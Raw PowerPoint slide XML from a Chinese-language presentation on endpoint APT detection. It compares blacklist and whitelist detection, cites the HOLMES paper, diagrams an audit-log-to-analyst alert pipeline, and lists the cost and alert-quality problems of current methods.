          <a:xfrm rot="10800000">
            <a:off x="9607035" y="3671092"/>
            <a:ext cx="1514474" cy="371475"/>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4" name="文本框 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381576" y="3193484"/>
            <a:ext cx="2057401" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基于模式匹配（黑名单）的检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9429861" y="3193506"/>
            <a:ext cx="2063750" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基于异常（白名单）的检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04A729E-23D7-4960-892C-058FB3023520}"/>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down)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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down)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="2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ldLvl="0" animBg="1"/>
      <p:bldP spid="107" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="111" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="112" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="113" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="114" grpId="0"/>
      <p:bldP spid="1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基于白名单检测方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="153035" y="2741295"/>
            <a:ext cx="11451590" cy="3509010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5EAFA5-2DD3-42EF-B7A4-946503329629}"/>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基于黑名单检测方法举例</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HOLMES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="635952" y="1872000"/>
            <a:ext cx="10920095" cy="2511425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362199" y="4248000"/>
            <a:ext cx="7467600" cy="2214880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="6480000"/>
            <a:ext cx="7920000" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MILAJERDI S M, GJOMEMO R, ESHETE B, et al. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HOLMES:real-time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> APT detection through correlation of suspicious information flows, S&amp;P2019</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{999C1D3A-8CAF-4558-9002-31D906871B8D}"/>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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="7920000" cy="648000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr 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XDR-</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现有终端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检测方法存在的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2768600" y="2096135"/>
            <a:ext cx="6094730" cy="1477645"/>
            <a:chOff x="3732" y="917"/>
            <a:chExt cx="9598" cy="2327"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="流程图: 可选过程 8"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5263" y="1748"/>
              <a:ext cx="2413" cy="1496"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">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1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="流程图: 可选过程 9"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9151" y="1748"/>
              <a:ext cx="4179" cy="1495"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">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1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="组合 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9373" y="2183"/>
              <a:ext cx="1100" cy="858"/>
              <a:chOff x="9785" y="7457"/>
              <a:chExt cx="1100" cy="858"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="350" name="Picture 10" descr="Picture 10"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId27"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId31"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10049" y="7457"/>
                <a:ext cx="836" cy="859"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="390" name="男"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId28"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9785" y="7531"/>
                <a:ext cx="264" cy="712"/>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panose="02000503000000020004"/>
                  </a:defRPr>
                </a:pPr>
                <a:endParaRPr sz="1600">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="文本框 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5413" y="2183"/>
              <a:ext cx="2129" cy="727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Graph_based APT detection tool</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="流程图: 终止 42"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7851" y="2272"/>
              <a:ext cx="1253" cy="57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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Alarm graphs </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="文本框 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5814" y="1749"/>
              <a:ext cx="1326" cy="436"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Detection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="文本框 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10551" y="1698"/>
              <a:ext cx="1657" cy="436"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Investigation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="流程图: 终止 45"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3732" y="2273"/>
              <a:ext cx="1415" cy="573"/>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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>System audit logs </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="47" name="直接箭头连接符 46"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="46" idx="3"/>
              <a:endCxn id="17" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId17"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5147" y="2547"/>
              <a:ext cx="266" cy="13"/>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7" idx="3"/>
              <a:endCxn id="43" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId18"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7542" y="2547"/>
              <a:ext cx="309" cy="12"/>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流程图: 可选过程 142"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId19"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5057" y="917"/>
              <a:ext cx="5160" cy="832"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1270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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Knowledge</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Environment, Workload location, Business type </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="流程图: 终止 48"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId20"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10916" y="2068"/>
              <a:ext cx="2313" cy="463"/>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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>True Positives(TP)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="流程图: 终止 49"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId21"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10916" y="2645"/>
              <a:ext cx="2313" cy="463"/>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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>False Positives(FP) </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="肘形连接符 51"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId22"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5147" y="1324"/>
              <a:ext cx="4908" cy="808"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">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3" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId23"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9104" y="2552"/>
              <a:ext cx="241" cy="7"/>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350" idx="3"/>
              <a:endCxn id="49" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId24"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10473" y="2300"/>
              <a:ext cx="443" cy="313"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50113"/>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350" idx="3"/>
              <a:endCxn id="50" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId25"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10473" y="2613"/>
              <a:ext cx="443" cy="264"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50113"/>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 name="流程图: 可选过程 56"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId26"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9406" y="2952"/>
              <a:ext cx="1117" cy="292"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartAlternateProcess">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1270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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Analyst</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2803525" y="3789680"/>
            <a:ext cx="2314575" cy="856615"/>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b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Q 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行成本高</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cost-computing, 100MB, 3~5%</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cost-network, 50MB/day/host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cost-storage, 200MB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="矩形 53"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242560" y="3789680"/>
            <a:ext cx="1952625" cy="856615"/>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200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Q 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>告警质量差</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
